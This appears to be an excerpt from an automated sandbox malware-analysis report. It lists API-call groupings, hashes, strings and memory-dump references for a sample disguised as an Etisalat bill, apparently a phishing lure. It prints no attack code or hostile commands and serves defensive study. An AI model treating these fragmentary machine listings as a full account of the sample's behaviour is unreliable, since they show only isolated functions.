                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow$_memmove
                                      • String ID:
                                      • API String ID: 2983881199-0
                                      • Opcode ID: 18d29fd0d5f57da9fa5daf8688585caf48ad34ddf6ae8d036a591670f15a1380
                                      • Instruction ID: 2727ac63fde9e02002b8729562e59d22039a0c31b0f33eb58773697361e1f807
                                      • Opcode Fuzzy Hash: 18d29fd0d5f57da9fa5daf8688585caf48ad34ddf6ae8d036a591670f15a1380
                                      • Instruction Fuzzy Hash: 5221F531B00244BBDB10AA618C86EFE3BE8EF4A750F0400B4FA04DB251DAB1CD45C791
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B6134D
                                      • SelectObject.GDI32(?,00000000), ref: 00B6135C
                                      • BeginPath.GDI32(?), ref: 00B61373
                                      • SelectObject.GDI32(?,00000000), ref: 00B6139C
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 6440cca4a297e6e8755e0ea2b80578e6120f7a0549954c5df703c474f3558cb1
                                      • Instruction ID: 61288e75f9d9a4e33feda8b67343a85604f989a68b56645675af7a042d180911
                                      • Opcode Fuzzy Hash: 6440cca4a297e6e8755e0ea2b80578e6120f7a0549954c5df703c474f3558cb1
                                      • Instruction Fuzzy Hash: 8221CF70810308EFDB218F29ED447AD7BF8FB00321F188666F81196AE1D7759992DFA4
                                      APIs
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 1ee863d3f6a558cda19472a971aab69304f109acf6bb35ed3c9cacb2f080e0fb
                                      • Instruction ID: 4e609d13dac3dff01f9b15d6bf2d6216db93f9d6dd64075395feab9aa2d1b774
                                      • Opcode Fuzzy Hash: 1ee863d3f6a558cda19472a971aab69304f109acf6bb35ed3c9cacb2f080e0fb
                                      • Instruction Fuzzy Hash: B301967160610A7BD204F62C5C42EFB6BDCDF11394B0440A1FE04B7263F7A09E16C2A4
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00BC4D5C
                                      • __beginthreadex.LIBCMT ref: 00BC4D7A
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00BC4D8F
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BC4DA5
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BC4DAC
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                      • String ID:
                                      • API String ID: 3824534824-0
                                      • Opcode ID: f4924e3c2e014e6c0188ffa39177d79b0f737a50c278fe242175fbc458ef13da
                                      • Instruction ID: cd48fbed58f8b583905ac3fc4fe5ee0be141ecdc7f6cca57f72d5a8f2576b9dd
                                      • Opcode Fuzzy Hash: f4924e3c2e014e6c0188ffa39177d79b0f737a50c278fe242175fbc458ef13da
                                      • Instruction Fuzzy Hash: 4A11E572904249ABC7119BB89C44FAF7BECEB45320F1442A9F915D7250D7718D4087B1
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BB8766
                                      • GetLastError.KERNEL32(?,00BB822A,?,?,?), ref: 00BB8770
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00BB822A,?,?,?), ref: 00BB877F
                                      • HeapAlloc.KERNEL32(00000000,?,00BB822A,?,?,?), ref: 00BB8786
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BB879D
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 901cd496f0d4d477eb1a33c7edec666bdc7bb04c42386063da0dfc2118013278
                                      • Instruction ID: c956001101ddb26eb80a1a894f76b491380e502b8f4f171df0854b0485b22f77
                                      • Opcode Fuzzy Hash: 901cd496f0d4d477eb1a33c7edec666bdc7bb04c42386063da0dfc2118013278
                                      • Instruction Fuzzy Hash: BF014B71600249EFDB204FA6DC88DBB7BACEF8A3957200569F949C7260DE718C00CA60
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC5502
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BC5510
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC5518
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BC5522
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 4c92c35533e77f6a61d07b151d7a0333d2a075558a63f9221082881dfb8a1595
                                      • Instruction ID: da1a32eaba0c021a281d2be77aff347fb5ae31429c5c5e3b71fb46bb459f81d5
                                      • Opcode Fuzzy Hash: 4c92c35533e77f6a61d07b151d7a0333d2a075558a63f9221082881dfb8a1595
                                      • Instruction Fuzzy Hash: D6010C35D05A1EDBCF109BE5E888BEDBBB9FB19711F41019AE501B6240DF306594C7A2
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?,?,00BB799D), ref: 00BB766F
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB768A
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB7698
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?), ref: 00BB76A8
                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB76B4
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: aec527f32c7bd380ba907b2d2faaf0285568cc6a4d5efbac6122ae16c2d2e85f
                                      • Instruction ID: 25358a4ae1d670417eab5ea32189e5b8d88a93641757dfa50dff08c2f6c8b103
                                      • Opcode Fuzzy Hash: aec527f32c7bd380ba907b2d2faaf0285568cc6a4d5efbac6122ae16c2d2e85f
                                      • Instruction Fuzzy Hash: 08017172601605ABDB109F58DC84ABE7BEDEB85752F144068FD05D7211EF71DE409BA0
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BB8608
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BB8612
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BB8621
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BB8628
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BB863E
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: c7601de0b12fdca76cd6aa5ee19453312cea57831f1b0f11b092d951ef811267
                                      • Instruction ID: f57ccad7646f086a65734584bef6e6191a5cceabcffc10d07ae4ad0183014688
                                      • Opcode Fuzzy Hash: c7601de0b12fdca76cd6aa5ee19453312cea57831f1b0f11b092d951ef811267
                                      • Instruction Fuzzy Hash: 27F06D31201245AFEB100FA5DCCDEBB3BACEF8A754B044569FA4ADB190CFB19C41DA60
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BB8669
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8673
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8682
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8689
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB869F
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 65e7b05269dc1235df7de0b80977d67fe447757795b643321d012fc98389b78c
                                      • Instruction ID: 90412e05889c14d54840a0b59ce75c0a21479e63652c7fa8908cb7e323fd7cac
                                      • Opcode Fuzzy Hash: 65e7b05269dc1235df7de0b80977d67fe447757795b643321d012fc98389b78c
                                      • Instruction Fuzzy Hash: 05F04F71200245AFEB111FA5ECC8EB73BACEF8A754B100169F946DB1A0DEB19D41DA60
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00BBC6BA
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BBC6D1
                                      • MessageBeep.USER32(00000000), ref: 00BBC6E9
                                      • KillTimer.USER32(?,0000040A), ref: 00BBC705
                                      • EndDialog.USER32(?,00000001), ref: 00BBC71F
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 96326cb399847733e3b7fdacb0712d7d76591730d33796952cce500145f05e18
                                      • Instruction ID: 08ecf4eb2204353347ad590738eb8dec055864e528c796bb93fddda36193440e
                                      • Opcode Fuzzy Hash: 96326cb399847733e3b7fdacb0712d7d76591730d33796952cce500145f05e18
                                      • Instruction Fuzzy Hash: E8014B30500705ABEB219B20DD8EFB67BB8FF00705F0006A9B686A64E1DFE4A954CA80
                                      APIs
                                      • EndPath.GDI32(?), ref: 00B613BF
                                      • StrokeAndFillPath.GDI32(?,?,00B9BAD8,00000000,?), ref: 00B613DB
                                      • SelectObject.GDI32(?,00000000), ref: 00B613EE
                                      • DeleteObject.GDI32 ref: 00B61401
                                      • StrokePath.GDI32(?), ref: 00B6141C
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 1193c340fc4ace305dc4e6a246d8970b6427615b0f1ebc7e924730eceb24f812
                                      • Instruction ID: 7a071bc0e3117c74837770b6eff35d961709d5473ad00ec7a97bd52f40e45657
                                      • Opcode Fuzzy Hash: 1193c340fc4ace305dc4e6a246d8970b6427615b0f1ebc7e924730eceb24f812
                                      • Instruction Fuzzy Hash: AAF0E130014349EBDB219F1AEC4D7683FE5E701326F08C265E4294A5F1CB354596DF60
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00BCC69D
                                      • CoCreateInstance.OLE32(00BF2D6C,00000000,00000001,00BF2BDC,?), ref: 00BCC6B5
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • CoUninitialize.OLE32 ref: 00BCC922
                                      Strings
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                      • String ID: .lnk
                                      • API String ID: 2683427295-24824748
                                      • Opcode ID: 8ef980bcaf0ac0bd2e29a1a7f87d0a730c35931d0faa6860dbbe22f35d4e4948
                                      • Instruction ID: cbe4b098d28a488bd13a97aa6e5ddafe6b2d0d47c14c824e3264add7643b8e3f
                                      • Opcode Fuzzy Hash: 8ef980bcaf0ac0bd2e29a1a7f87d0a730c35931d0faa6860dbbe22f35d4e4948
                                      • Instruction Fuzzy Hash: CFA15C71108205AFD700EF54C891EABB7ECFF94704F0449ACF1969B1A2DB74EA09CB52
                                      APIs
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00B67BB1: _memmove.LIBCMT ref: 00B67C0B
                                      • __swprintf.LIBCMT ref: 00B7302D
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B72EC6
                                      Similarity
                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 1943609520-557222456
                                      • Opcode ID: a38c432d8dd9f77a2377a92772109cbfbbc0a1fb9ea87e5ceb80c82e087fa4ab
                                      • Instruction ID: c76f11b31d8da00c2cebbaacefb858f1d56778692bb87ab10ba4d04f8f9d3d82
                                      • Opcode Fuzzy Hash: a38c432d8dd9f77a2377a92772109cbfbbc0a1fb9ea87e5ceb80c82e087fa4ab
                                      • Instruction Fuzzy Hash: AB917A711083019FCB28EF24D895D6EB7E8EF85B40F0449ADF4969B2A1DE34EE45CB52
                                      APIs
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                      • CoInitialize.OLE32(00000000), ref: 00BCBC26
                                      • CoCreateInstance.OLE32(00BF2D6C,00000000,00000001,00BF2BDC,?), ref: 00BCBC3F
                                      • CoUninitialize.OLE32 ref: 00BCBC5C
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 12a570be9d3da72b2cce78df2fcb8f7c0a27c81d0868e1f9ea13a86dc012eb0c
                                      • Instruction ID: 3df9e45a6c6a918380b030e4bfa514d29e5706047995b3f00a8c3389a0f66f81
                                      • Opcode Fuzzy Hash: 12a570be9d3da72b2cce78df2fcb8f7c0a27c81d0868e1f9ea13a86dc012eb0c
                                      • Instruction Fuzzy Hash: 44A122756043019FCB10DF14C485E6ABBE9FF89314F14899CF99A9B2A1CB31ED45CB91
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 00B852DD
                                        • Part of subcall function 00B90340: __87except.LIBCMT ref: 00B9037B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: cb9d75b407536ff574e44c3d3dda52e58a68a79dd67fe05672664d38ec4fb2b3
                                      • Instruction ID: 8497754b41bfb547c939744341f49a80b6eccc3431496c2fdb00233b4d5a674b
                                      • Opcode Fuzzy Hash: cb9d75b407536ff574e44c3d3dda52e58a68a79dd67fe05672664d38ec4fb2b3
                                      • Instruction Fuzzy Hash: 42515B21A2D6029BDF21BB24C94137E2BE4DB10750F2449F8E496823F6EE748CD4DB4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #$+
                                      • API String ID: 0-2552117581
                                      • Opcode ID: 18cb51a5f844da246c36f10b8e66cd8f1e25521dfd1a68e9d703329fdbe730c5
                                      • Instruction ID: 1f401ae3184b244246666d4ec06fed5b51f4f8f9525ba06583d6cc820d351c12
                                      • Opcode Fuzzy Hash: 18cb51a5f844da246c36f10b8e66cd8f1e25521dfd1a68e9d703329fdbe730c5
                                      • Instruction Fuzzy Hash: 675124751046468FDF25EF28D488BFA7BE4EF19310F1841E5EC919B2A0DBB49C46C762
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$_memmove
                                      • String ID: ERCP
                                      • API String ID: 2532777613-1384759551
                                      • Opcode ID: 5418dbf0e9ce96bc64c6aadad7cddc762c99cc6a3a420f3354b4086e94aeda8c
                                      • Instruction ID: c9c86ba710b00d815bb9a271a6ad3ad5d4d39a85b28e7db5f6954eb33c1339ad
                                      • Opcode Fuzzy Hash: 5418dbf0e9ce96bc64c6aadad7cddc762c99cc6a3a420f3354b4086e94aeda8c
                                      • Instruction Fuzzy Hash: AE51A071900B099BDB24CF69C8917EABBF8EF04714F2085AEE55EDB251E771D984CB40
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BEF910,00000000,?,?,?,?), ref: 00BE7C4E
                                      • GetWindowLongW.USER32 ref: 00BE7C6B
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BE7C7B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: df02e18d5f99a5f1909d4b0b0eefc830a27f4e21aaf2ba5899424103705ac070
                                      • Instruction ID: a786e9fd1369e05501d3ab056e90a24bc3d819cfb2cc872ca7521c56272afa38
                                      • Opcode Fuzzy Hash: df02e18d5f99a5f1909d4b0b0eefc830a27f4e21aaf2ba5899424103705ac070
                                      • Instruction Fuzzy Hash: 3F31DE31244286AFDB118F39DC41BEA77E9EF45324F204765F875932E0CB31E8519B60
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BE76D0
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BE76E4
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BE7708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: b256f48d3afd1f94a992596f847a211b587fb486a2dbc1cf145b26b9d3b57769
                                      • Instruction ID: 17600c5678f0a1f9333fe4d405bd8f399a326e2c3836aab195549e1697c825b5
                                      • Opcode Fuzzy Hash: b256f48d3afd1f94a992596f847a211b587fb486a2dbc1cf145b26b9d3b57769
                                      • Instruction Fuzzy Hash: 9A21BF32540259AFDF21CEA4CC86FEA3BA9EF48714F110294FE156B1D0DBB1AC518BA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BE6FAA
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BE6FBA
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BE6FDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 8d83b159cb473130fb78b3d39e31d98cbedded185975bea8d3f5812111296aaa
                                      • Instruction ID: 242c83565ed8cf3cba3abcff484cd9a6a424dd199e5e6d04befb6ac352b5b34d
                                      • Opcode Fuzzy Hash: 8d83b159cb473130fb78b3d39e31d98cbedded185975bea8d3f5812111296aaa
                                      • Instruction Fuzzy Hash: EC218E32610158BFDF118F55EC85FAB3BAAEF997A4F018164F9149B190CB71AC518BE0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BE79E1
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BE79F6
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BE7A03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: aa337b834fac6f234744e61214d6676962b84e14b52e0a1fda7a40933c53f954
                                      • Instruction ID: 46f014eceeb80f7e7112601bc1a45b8c6edd6a216f49a7b1c3bb0cfff43907cc
                                      • Opcode Fuzzy Hash: aa337b834fac6f234744e61214d6676962b84e14b52e0a1fda7a40933c53f954
                                      • Instruction Fuzzy Hash: 97112372290288BBEF209F71CC05FEB37A9EF89B64F010568FA01A6090D7719811DB60
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00B64C2E), ref: 00B64CA3
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B64CB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: c47fe79c07e6f6b40e8c29991453948671405231606e8465dc810fa40e1752d6
                                      • Instruction ID: 085b4b5a8e7bbb9d1f73e361197ae9c3687b49bd79942b4d16903fbd92029d79
                                      • Opcode Fuzzy Hash: c47fe79c07e6f6b40e8c29991453948671405231606e8465dc810fa40e1752d6
                                      • Instruction Fuzzy Hash: F3D01230510B67CFD7205F31D95861676D5EF05751B11C8BD9886DA260DBB4D4C0CA51
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00B64CE1,?), ref: 00B64DA2
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B64DB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
